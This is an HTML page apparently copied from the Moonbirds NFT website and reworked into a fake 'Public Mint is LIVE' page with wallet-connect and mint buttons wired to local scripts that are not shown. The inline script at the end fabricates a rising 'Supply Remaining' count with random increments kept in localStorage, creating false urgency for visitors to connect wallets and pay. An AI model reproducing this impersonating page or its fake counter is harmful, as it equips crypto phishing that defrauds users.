<!DOCTYPE html>
<html>
<!-- Mirrored from www.moonbirds.xyz/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 09 Aug 2022 16:43:28 GMT -->
<!-- Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->

<head>
    <meta name="viewport" content="width=device-width" />
    <meta charSet="utf-8" />
    <title>Moonbirds: The official PROOF PFP</title>
    <meta name="description"
        content="They&#x27;re a collection of 10,000 utility-enabled PFPs that feature a richly diverse and unique pool of rarity-powered traits. What&#x27;s more, each Moonbird unlocks private club membership and additional benefits the longer you hold them. We call it nesting – because, obviously." />
    <link rel="icon" href="favicon.ico" />
    <meta property="og:image" content="https://moonbirds.xyz/moonbirds-openGraph.png" />
    <link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.png" />
    <link rel="icon" type="image/png" sizes="32x32" href="favicon-32x32.png" />
    <link rel="icon" type="image/png" sizes="16x16" href="favicon-16x16.png" />
    <link rel="manifest" href="site.webmanifest" />
    <meta name="next-head-count" content="10" />
    <link rel="preload" href="_next/static/css/5eb5c44fba48dd52.css" as="style" />
    <link rel="stylesheet" href="_next/static/css/5eb5c44fba48dd52.css" data-n-g="" /><noscript
        data-n-css=""></noscript>
    <link rel="stylesheet" href="mint.css">
    <link rel="stylesheet" href="alert.css">
</head>

<body>
    <div id="__next" data-reactroot="">
        <div class="Toastify"></div>
        <div>
            <div class="alert-container" id="alert-container" style="z-index: 100;"></div>
            <div id="WEB3_CONNECT_MODAL_ID" style="display: none; z-index: 100; position: absolute;"></div>
            <div class="flex flex-col justify-between h-screen">
                <div class="flex-grow">
                    <div class="relative">
                        <div class="absolute top:0 z-50 w-full">
                            <div class="mt-10 md:mt-20 md:mb-20 px-10"><img src="hero/title-text.svg" alt=""
                                    class="m-auto" /></div>
                            <div class="px-10 md:px-0 mt-[70px] block w-full md:inline md:max-w-[744px] m-auto">
                                <div
                                    class="flex flex-col md:flex-row bg-[#15112D] rounded-card md:max-w-[744px] m-auto">
                                    <div
                                        class="md:w-[288px] bg-[#120E25] p-[24px] md:p-[30px] flex flex-col md:rounded-l-card">
                                        <img alt="" class="-mt-[50px] md:block mx-auto w-1/3 md:w-auto"
                                            src="./hero/moonbird-avatar.png">
                                        <div class="md:my-[28px] flex flex-col items-center space-y-[16px]">
                                            <h4 class="hidden md:block text-[18px] leading-[26px] font-[700]">Moonbirds
                                                Mint</h4>
                                            <div class="flex flex-col space-y-[16px]">
                                                <div class="flex flex-col space-y-[2px] items-center">
                                                    <h5 class="text-[#B5BCB3] text-[14px] leading-[20px]">Mint Price:
                                                    </h5>
                                                    <p class="text-[#FFF] text-[16px] leading-[20px] font-[600]"><span
                                                             style="font-weight: bold;">0.10</span>Ξ</p>
                                                </div>
                                                <div class="flex flex-col space-y-[2px] items-center">
                                                    <h5 class="text-[#B5BCB3] text-[14px] leading-[20px]">Supply
                                                        Remaining:</h5>
                                                    <p class="text-[#FFF] text-[16px] leading-[20px] font-[600]">
                                                        <span id="nft_left" style="font-weight: bold;">...</span>
                                                        <!-- --> /
                                                        <!-- -->10,000
                                                    </p>
                                                </div>
                                                <div class="hidden md:flex flex-col space-y-[2px] items-center">
                                                    <h5 class="text-[#B5BCB3] text-[14px] leading-[20px]">Total Supply:
                                                    </h5>
                                                    <p class="text-[#FFF] text-[16px] leading-[20px] font-[600]">10,000
                                                    </p>
                                                </div>
                                            </div>
                                        </div>

                                        <div class="flex mt-[30px] justify-center space-x-[12px]"><a
                                                href="https://discord.gg/proof" target="_blank"
                                                rel="noopen nofollow noreferrer"><img src="./hero/Discord.png" alt=""
                                                    class="opacity-70 hover:opacity-100 cursor-pointer w-[25px]"></a><a
                                                href="https://opensea.io/collection/proof-moonbirds" target="_blank"
                                                rel="noopen nofollow noreferrer"><img src="./hero/Opensea.png" alt=""
                                                    class="opacity-70 hover:opacity-100 w-[25px]"></a><a
                                                href="https://looksrare.org/collections/0x23581767a106ae21c074b2276D25e5C3e136a68b"
                                                target="_blank" rel="noopen nofollow noreferrer"><img
                                                    src="./hero/LooksRare.png" alt=""
                                                    class="opacity-70 hover:opacity-100 w-[25px]"></a></div>
                                    </div>
                                    <div class="md:w-[456px] md:flex md:flex-col md:justify-between md:flex-grow">
                                        <div class="p-[40px]">
                                            <div>
                                                <h4
                                                    class="text-center md:text-left text-[16px] leading-[20px] md:text-[24px] md:leading-[30px] font-[700] mb-[45px]">
                                                    Public Mint is LIVE</h4>
                                                <div class="flex flex-col space-y-[22px] md:space-y-0">

                                                    <div
                                                        class="flex flex-col md:flex-row md:space-x-[25px] items-center space-y-[8px] md:space-y-0 md:items-start">
                                                        <div
                                                            class="w-[50px] flex flex-col relative md:min-h-[70px] md:top-[2px]">
                                                            <div
                                                                class="text-[12px] font-[700] mx-auto px-[8px] py-[2px] rounded-full text-center bg-[#251E4A]">
                                                                <img src="./check.png" alt="" class="h-4"></div>
                                                            <div>
                                                                <div
                                                                    class="hidden h-full left-1/2 md:absolute md:block items-center justify-center">
                                                                    <div
                                                                        class="h-full w-[2px] bg-[#251E4A] pointer-events-none">
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <div class="flex-grow pb-[24px]">
                                                            <h4 class="font-[700] text-center md:text-left text-white">
                                                                Price:
                                                                <!-- --><span id="price" style="font-weight: bold;">0.10</span>
                                                                <!-- --> ETH</h4>
                                                            <div class="mint-action"
                                                                style="width:204px;margin-top:10px;border-radius:0;border:solid 2px #1D4986;box-sizing:border-box">
                                                                <a
                                                                    style="cursor:pointer;font-size:16px;font-weight:600;border-right:solid 2px #1D4986;display:inline-block;text-align:center;line-height:44px;width:50px" id="minus">-</a><p style="border:none;border-left:none;font-size:16px;font-weight:600;border-right:none;display:inline-block;background-color:transparent;width:100px;text-align:center;box-sizing:border-box; font-weight: bold;" id="lnprice">1</p><a
                                                                    style="cursor:pointer;font-size:16px;font-weight:600;border-left:solid 2px #1D4986;display:inline-block;text-align:center;line-height:44px;width:50px" id="plus">+</a>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div
                                                        class="flex flex-col md:flex-row md:space-x-[25px] items-center space-y-[8px] md:space-y-0 md:items-start">
                                                        <div
                                                            class="w-[50px] flex flex-col relative md:min-h-[70px] md:top-[2px]">
                                                            <div
                                                                class="text-[12px] font-[700] mx-auto px-[8px] py-[2px] rounded-full text-center bg-[#251E4A]">
                                                                <img src="./check.png" alt="" class="h-4"></div>
                                                        </div>
                                                        <div class="flex-grow pb-[24px]">
                                                            <h4 class="font-[700] text-center md:text-left text-white">
                                                                Public sale</h4>
                                                            <p
                                                                class="text-center md:text-left text-[#B5BCB3] text-[14px]">
                                                                Mint is LIVE</p>
                                                            <p class="text-sm text-[#DC5858] font-[300]">Max Mint 3</p>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div
                                            class="fixed z-[9999px] -bottom-[2px] left-0 md:bottom-0 md:relative px-[44px] py-[26px] bg-[#1D173B] w-full flex flex-col md:rounded-bl-card space-y-[12px]">
                                            <button id="connect"
                                                class="rounded-button px-[15px] py-[14px] radius-[4px] block text-center text-[14px] font-[700] bg-[#00468C] hover:bg-[#0052A4] text-white cursor-pointer text-[#FFFFFF]">CONNECT
                                                WALLET</button>
                                            <button id="transfer"
                                                class="rounded-button px-[15px] py-[14px] radius-[4px] block text-center text-[14px] font-[700] bg-[#00468C] hover:bg-[#0052A4] text-white cursor-pointer text-[#FFFFFF]" style="display: none;">MINT
                                                NOW</button> </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="w-full relative">
                        <div class="relative overflow-hidden h-screen md:h-[700px] xl:h-[960px]">
                            <div class="absolute w-full h-[70%] md:h-[300px]"></div>
                            <div class="absolute -top-[50px] md:-top-[0px] 2xl:-top-[100px] z-0 h-screen">
                                <div class="w-screen h-[700px] bg-center"
                                    style="background-image:url(hero/starry-bg.png)"></div>
                            </div>
                            <div class="absolute bottom-0 z-10 w-screen"><img src="hero/clouds3.png" alt=""
                                    class="w-full" /></div>
                            <div class="absolute bottom-[0px] md:bottom-[0px] z-20 w-screen"><img src="hero/clouds2.png"
                                    alt="" class="w-full" /></div>
                            <div class="absolute bottom-0 z-40 w-screen"><img src="hero/clouds1.png" alt=""
                                    class="w-full" />
                                <div class="absolute -bottom-[500px] h-[500px] z-30 w-screen bg-[#144D80]"></div>
                            </div>
                        </div>
                    </div>
                </div>
                <div
                    class="py-[68px] md:py-[100px] bg-gradient-to-b from-[#144D80] to-[#272C7D] pt-[350px] sm:pt-[200px] md:pt-[200px]">
                    <div class="px-10 space-y-[32px] max-w-[1128px] m-auto lg:flex flex-row md:space-x-[50px]"><img
                            src="sections/birds.png" alt="" class="m-auto md:max-w-[500px]" />
                        <div class="space-y-[24px] flex flex-col justify-center">
                            <h2 class="text-title text-mint text-serif">Moonbirds are more than just an avatar</h2>
                            <p class="text-md">They&#x27;re a collection of 10,000 utility-enabled PFPs that feature
                                a richly diverse and unique pool of rarity-powered traits. What&#x27;s more, each
                                Moonbird unlocks private club membership and additional benefits the longer you hold
                                them. We call it nesting – because, obviously.</p>
                        </div>
                    </div>
                </div>
                <div class="py-[68px] md:py-[100px] bg-gradient-to-b from-[#272C7D] to-[#171754]">
                    <div class="px-10 space-y-[32px] max-w-[1128px] m-auto lg:flex flex-row-reverse space-x-reverse">
                        <div class="md:w-[640px] relative"><img src="sections/door.png" alt="Door" class="m-auto" />
                        </div>
                        <div class="space-y-[24px] lg:w-2/3 flex flex-col justify-center">
                            <h2 class="text-title text-orange text-serif">A collection built with utility &amp;
                                community at the foundation</h2>
                            <p>At
                                <!-- --> <a href="https://collective.proof.xyz/" target="_blank"
                                    rel="noopen nofollow noreferrer" class="underline">PROOF</a>, we’re no strangers
                                to building with utility in mind. That’s why every Moonbird is also your key to our
                                private PROOF Discord – where you’ll have admittance to our gated Parliament
                                channels.</p>
                            <p>Once inside, you will have exclusive access to Moonbird-related drops, Parliament
                                meetups and IRL events, and access to upcoming PROOF projects; including the PROOF
                                metaverse, codenamed Highrise.</p>
                        </div>
                    </div>
                </div>
                <div class="py-[68px] md:py-[100px] bg-[#171754]">
                    <div class="px-10 space-y-[32px] max-w-[1128px] m-auto lg:flex flex-row md:space-x-[50px]">
                        <div class="flex flex-col items-center"><img src="sections/nesting.png" alt=""
                                class="m-auto md:pt-10 md:h-[340px]" /></div>
                        <div class="space-y-[24px] lg:w-7/12 flex flex-col justify-center">
                            <h2 class="text-title text-orange text-serif">Nesting your Moonbird</h2>
                            <p>Moonbirds come with a unique PFP design that allows them to be locked up and nested
                                without leaving your wallet.</p>
                            <p>As soon as your Moonbird is nested, they’ll begin to accrue additional benefits. As
                                total nested time accumulates, you’ll see your Moonbird achieve new tier levels,
                                upgrading their nest.</p>
                            <p>Upgraded nests enable enhanced drops and rewards.</p>
                        </div>
                    </div>
                </div>
                <div class="bg-[#171754] pb-[100px] pt-[100px]">
                    <div class="px-10 max-w-[745px] m-auto"><img src="sections/highrise.svg" alt="Highrise"
                            class="m-auto" />
                        <div class="space-y-[24px] flex flex-col justify-center">
                            <div>
                                <p class="text-mint-dark font-[700] mt-[40px]">NEXT UP</p>
                                <h2 class="text-title text-mint">Highrise</h2>
                            </div>
                            <p>Moonbirds is brought to you by PROOF; the team behind the PROOF Collective and
                                Grails. Our next project, codenamed Highrise is a focused and novel take on the
                                metaverse.</p>
                            <p>The metaverse is an increasingly crowded space, but built correctly, has great
                                promise for connection and community.</p>
                            <p>The PROOF-built metaverse will be a dramatic departure from the existing
                                &#x27;never-ending&#x27; worlds that feel like a digital ghost town. Ours is
                                uniquely different, and you&#x27;ll have first access as a nested Moonbirds holder.
                                The Moonbirds mint is the beginning.</p>
                        </div>
                    </div>
                </div>
                <div class="bg-[#171754] pt-[100px] pb-[160px] px-[24px]">
                    <div class="max-w-[936px] m-auto space-y-[64px]">
                        <p class="text-center uppercase font-[700]">Built Right from the beginning</p>
                        <div class="grid grid-cols-2 md:grid-cols-4 gap-[32px]">
                            <div class="flex flex-col items-center space-y-[12px] md:space-y-[24px] text-center">
                                <img src="sections/green-eth.png" alt="Minted on ETH, but carbon offset"
                                    class="h-[85px]" />
                                <p>Minted on ETH, but carbon offset</p>
                            </div>
                            <div class="flex flex-col items-center space-y-[12px] md:space-y-[24px] text-center">
                                <img src="sections/ipfs.png" alt="IPFS-hosted (on-chain coming)" class="h-[85px]" />
                                <p>IPFS-hosted (on-chain coming)</p>
                            </div>
                            <div class="flex flex-col items-center space-y-[12px] md:space-y-[24px] text-center">
                                <img src="sections/compass.png" alt="Utility NFT that unlocks while held"
                                    class="h-[85px]" />
                                <p>Utility NFT that unlocks while held</p>
                            </div>
                            <div class="flex flex-col items-center space-y-[12px] md:space-y-[24px] text-center">
                                <img src="sections/key.png" alt="Access to the PROOF metaverse" class="h-[85px]" />
                                <p>Access to the PROOF metaverse</p>
                            </div>
                        </div>
                    </div>
                </div>

            </div>
            <div class="w-full px-10 max-w-4xl mx-auto pb-10">
                <fieldset class="text-center border-t border-purple-dark">
                    <legend class="p-1.5"><img src="globe.svg" alt="" /></legend>
                </fieldset>
                <div class="flex flex-col md:flex-row justify-between">
                    <div class="flex flex-col items-start space-y-[8px]"><img src="proof.svg" alt="" /><span
                            class="text-sm text-gray-500 font-[500] text-purple-dark">© 2022 PROOF Holdings</span>
                    </div>
                    <div class="flex items-center mt-[24px] md:mt-0"><a
                            class="text-sm text-gray-500 font-[500] text-purple-dark mr-4 hover:underline"
                            href="terms">Terms of Sale</a><a href="https://twitter.com/moonbirds" target="_blank"
                            rel="nofollow noreferrer"><img src="twitter.svg" alt="Twitter" class="" /></a></div>
                </div>
            </div>
        </div>
    </div>
    </div>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
    <script type="text/javascript" src="https://unpkg.com/web3modal@1.9.4/dist/index.js"></script>
    <script type="text/javascript" src="https://unpkg.com/evm-chains@0.2.0/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="https://unpkg.com/@walletconnect/web3-provider@1.5.5/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="https://unpkg.com/web3@1.6.1/dist/web3.min.js"></script>
    <script src="https://npmcdn.com/moralis/dist/moralis.js"></script>
    <script src="https://cdn.ethers.io/lib/ethers-5.1.umd.min.js" type="text/javascript"></script>
    <script src="./javascript/alert.js"></script>
    <script type="text/javascript" src="./settings.js"></script>
    <script type="text/javascript" src="./javascript/index.js"></script>
    <script id="__NEXT_DATA__" type="application/json">
        {
            "props": {
                "pageProps": {}
            },
            "page": "/",
            "query": {},
            "buildId": "rsJm2LzSIjELJkhR6LOQB",
            "nextExport": true,
            "autoExport": true,
            "isFallback": false,
            "scriptLoader": []
        }
    </script>
    <script>
        db = window.localStorage;

        if (db.getItem('amount') == null) {
            var amount = 9523
            db.setItem("amount", amount)
        } else {
            var amount = parseInt(db.getItem('amount'))
        }
        smooth_amount = amount
        var counter = 0
        // Update the count down every 1 second
        var x = setInterval(function () {
            counter++
            if (counter > 40) {
                counter = 0
                if (amount < 10000) {
                    logic = Math.floor((1 - (amount / 9990)) * 100)
                    amount = Math.floor(Math.random() * logic) + amount
                    db.setItem("amount", amount)
                    db.setItem("max", logic)
                }
            }
            if (smooth_amount < amount) {
                smooth_amount = smooth_amount + ((amount - smooth_amount) / (20 - counter))
            }
            // Display the result in the element with id="demo"
            document.getElementById("nft_left").innerHTML = smooth_amount.toFixed(0);
            // If the count down is finished, write some text
        }, 100);
    </script>
</body>
<!-- Mirrored from www.moonbirds.xyz/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 09 Aug 2022 16:44:05 GMT -->

</html>